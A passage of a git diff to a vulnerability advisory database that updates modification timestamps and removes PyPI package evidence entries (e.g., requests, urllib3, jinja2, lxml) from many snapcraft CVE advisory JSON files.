"2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2013-2037.json b/advisories/BREW-snapcraft-CVE-2013-2037.json index bec6dc729f..782f83cc6a 100644 --- a/advisories/BREW-snapcraft-CVE-2013-2037.json +++ b/advisories/BREW-snapcraft-CVE-2013-2037.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2013-2037", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-q48q-77qv-cf9p", "CVE-2013-2037", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-0012.json b/advisories/BREW-snapcraft-CVE-2014-0012.json index 86f618df1f..0ae1f8409a 100644 --- a/advisories/BREW-snapcraft-CVE-2014-0012.json +++ b/advisories/BREW-snapcraft-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-0012", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1402.json b/advisories/BREW-snapcraft-CVE-2014-1402.json index df2420494a..3e36796608 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1402.json +++ b/advisories/BREW-snapcraft-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1402", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1624.json b/advisories/BREW-snapcraft-CVE-2014-1624.json index 86631cf517..ddb014ac5c 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1624.json +++ b/advisories/BREW-snapcraft-CVE-2014-1624.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1624", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-7372-q459-jxhr", "CVE-2014-1624", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyxdg", - "subject_version": "0.28", - "key": "pkg:pypi/pyxdg@0.28", - "resource": "pyxdg" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1829.json b/advisories/BREW-snapcraft-CVE-2014-1829.json index cb15491bb3..cbf086af33 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1829.json +++ b/advisories/BREW-snapcraft-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1829", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-1830.json b/advisories/BREW-snapcraft-CVE-2014-1830.json index ada0a554b2..ea6f4b8a6a 100644 --- a/advisories/BREW-snapcraft-CVE-2014-1830.json +++ b/advisories/BREW-snapcraft-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-1830", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2014-3146.json b/advisories/BREW-snapcraft-CVE-2014-3146.json index 6f0b96b0d8..99d388e7d9 100644 --- a/advisories/BREW-snapcraft-CVE-2014-3146.json +++ b/advisories/BREW-snapcraft-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2014-3146", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2015-2296.json b/advisories/BREW-snapcraft-CVE-2015-2296.json index 414ac9cf3e..24dd2b338e 100644 --- a/advisories/BREW-snapcraft-CVE-2015-2296.json +++ b/advisories/BREW-snapcraft-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2015-2296", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2015-5237.json b/advisories/BREW-snapcraft-CVE-2015-5237.json index e302c0e2d5..8aa83d7917 100644 --- a/advisories/BREW-snapcraft-CVE-2015-5237.json +++ b/advisories/BREW-snapcraft-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2015-5237", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2016-10745.json b/advisories/BREW-snapcraft-CVE-2016-10745.json index 548bf430af..43bb0a7f32 100644 --- a/advisories/BREW-snapcraft-CVE-2016-10745.json +++ b/advisories/BREW-snapcraft-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2016-10745", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2016-9015.json b/advisories/BREW-snapcraft-CVE-2016-9015.json index 110bd75eca..f30b62f36d 100644 --- a/advisories/BREW-snapcraft-CVE-2016-9015.json +++ b/advisories/BREW-snapcraft-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2016-9015", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2017-18342.json b/advisories/BREW-snapcraft-CVE-2017-18342.json index 3370ce9f75..9059cdfe88 100644 --- a/advisories/BREW-snapcraft-CVE-2017-18342.json +++ b/advisories/BREW-snapcraft-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2017-18342", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-18074.json b/advisories/BREW-snapcraft-CVE-2018-18074.json index c308a989c2..09601ef290 100644 --- a/advisories/BREW-snapcraft-CVE-2018-18074.json +++ b/advisories/BREW-snapcraft-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-18074", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-19787.json b/advisories/BREW-snapcraft-CVE-2018-19787.json index c09ff905dc..e7117f53e8 100644 --- a/advisories/BREW-snapcraft-CVE-2018-19787.json +++ b/advisories/BREW-snapcraft-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-19787", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-20060.json b/advisories/BREW-snapcraft-CVE-2018-20060.json index 4e237a038f..6e7f4591d7 100644 --- a/advisories/BREW-snapcraft-CVE-2018-20060.json +++ b/advisories/BREW-snapcraft-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-20060", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2018-25091.json b/advisories/BREW-snapcraft-CVE-2018-25091.json index d85a769e21..01b72017b4 100644 --- a/advisories/BREW-snapcraft-CVE-2018-25091.json +++ b/advisories/BREW-snapcraft-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2018-25091", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-10906.json b/advisories/BREW-snapcraft-CVE-2019-10906.json index a5cd8614dd..906877fc80 100644 --- a/advisories/BREW-snapcraft-CVE-2019-10906.json +++ b/advisories/BREW-snapcraft-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-10906", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-11236.json b/advisories/BREW-snapcraft-CVE-2019-11236.json index d99b4ca993..25288edef5 100644 --- a/advisories/BREW-snapcraft-CVE-2019-11236.json +++ b/advisories/BREW-snapcraft-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-11236", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-11324.json b/advisories/BREW-snapcraft-CVE-2019-11324.json index 1caf726f75..fa099ab410 100644 --- a/advisories/BREW-snapcraft-CVE-2019-11324.json +++ b/advisories/BREW-snapcraft-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-11324", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-12761.json b/advisories/BREW-snapcraft-CVE-2019-12761.json index cc6e28aa0f..164a23a838 100644 --- a/advisories/BREW-snapcraft-CVE-2019-12761.json +++ b/advisories/BREW-snapcraft-CVE-2019-12761.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-12761", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-r6v3-hpxj-r8rv", "CVE-2019-12761", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyxdg", - "subject_version": "0.28", - "key": "pkg:pypi/pyxdg@0.28", - "resource": "pyxdg" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-19588.json b/advisories/BREW-snapcraft-CVE-2019-19588.json index dcc0fe807f..aa068fa857 100644 --- a/advisories/BREW-snapcraft-CVE-2019-19588.json +++ b/advisories/BREW-snapcraft-CVE-2019-19588.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-19588", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-5qcg-w2cc-xffw", "CVE-2019-19588", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "validators", - "subject_version": "0.35.0", - "key": "pkg:pypi/validators@0.35.0", - "resource": "validators" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2019-20477.json b/advisories/BREW-snapcraft-CVE-2019-20477.json index 197de9ce2a..03fa85a4a3 100644 --- a/advisories/BREW-snapcraft-CVE-2019-20477.json +++ b/advisories/BREW-snapcraft-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2019-20477", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-11078.json b/advisories/BREW-snapcraft-CVE-2020-11078.json index fdac54e487..2faa8d4a62 100644 --- a/advisories/BREW-snapcraft-CVE-2020-11078.json +++ b/advisories/BREW-snapcraft-CVE-2020-11078.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-11078", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gg84-qgv9-w4pq", "CVE-2020-11078", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-14343.json b/advisories/BREW-snapcraft-CVE-2020-14343.json index 3669bb6c7f..3e04765ec7 100644 --- a/advisories/BREW-snapcraft-CVE-2020-14343.json +++ b/advisories/BREW-snapcraft-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-14343", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-1747.json b/advisories/BREW-snapcraft-CVE-2020-1747.json index 4bda2e76e8..7652f94303 100644 --- a/advisories/BREW-snapcraft-CVE-2020-1747.json +++ b/advisories/BREW-snapcraft-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-1747", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-26137.json b/advisories/BREW-snapcraft-CVE-2020-26137.json index c5c260667d..02c6de0c15 100644 --- a/advisories/BREW-snapcraft-CVE-2020-26137.json +++ b/advisories/BREW-snapcraft-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-26137", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-27783.json b/advisories/BREW-snapcraft-CVE-2020-27783.json index c92d3b89f5..cb3630563a 100644 --- a/advisories/BREW-snapcraft-CVE-2020-27783.json +++ b/advisories/BREW-snapcraft-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-27783", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-28493.json b/advisories/BREW-snapcraft-CVE-2020-28493.json index 06d0fe8b8a..bffba3cfee 100644 --- a/advisories/BREW-snapcraft-CVE-2020-28493.json +++ b/advisories/BREW-snapcraft-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-28493", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2020-7212.json b/advisories/BREW-snapcraft-CVE-2020-7212.json index c2f355cd3d..3f6fa6f41e 100644 --- a/advisories/BREW-snapcraft-CVE-2020-7212.json +++ b/advisories/BREW-snapcraft-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2020-7212", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-21240.json b/advisories/BREW-snapcraft-CVE-2021-21240.json index 89259fdff1..49843c6e44 100644 --- a/advisories/BREW-snapcraft-CVE-2021-21240.json +++ b/advisories/BREW-snapcraft-CVE-2021-21240.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-21240", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-93xj-8mrv-444m", "CVE-2021-21240", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-28363.json b/advisories/BREW-snapcraft-CVE-2021-28363.json index 38dec8dc5e..172c6e38fd 100644 --- a/advisories/BREW-snapcraft-CVE-2021-28363.json +++ b/advisories/BREW-snapcraft-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-28363", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-28957.json b/advisories/BREW-snapcraft-CVE-2021-28957.json index 3d29940d6f..c6740431f9 100644 --- a/advisories/BREW-snapcraft-CVE-2021-28957.json +++ b/advisories/BREW-snapcraft-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-28957", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-33503.json b/advisories/BREW-snapcraft-CVE-2021-33503.json index 85c1262a31..d988f3aa67 100644 --- a/advisories/BREW-snapcraft-CVE-2021-33503.json +++ b/advisories/BREW-snapcraft-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-33503", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-41945.json b/advisories/BREW-snapcraft-CVE-2021-41945.json index 7734119be8..f3e90cccfe 100644 --- a/advisories/BREW-snapcraft-CVE-2021-41945.json +++ b/advisories/BREW-snapcraft-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": 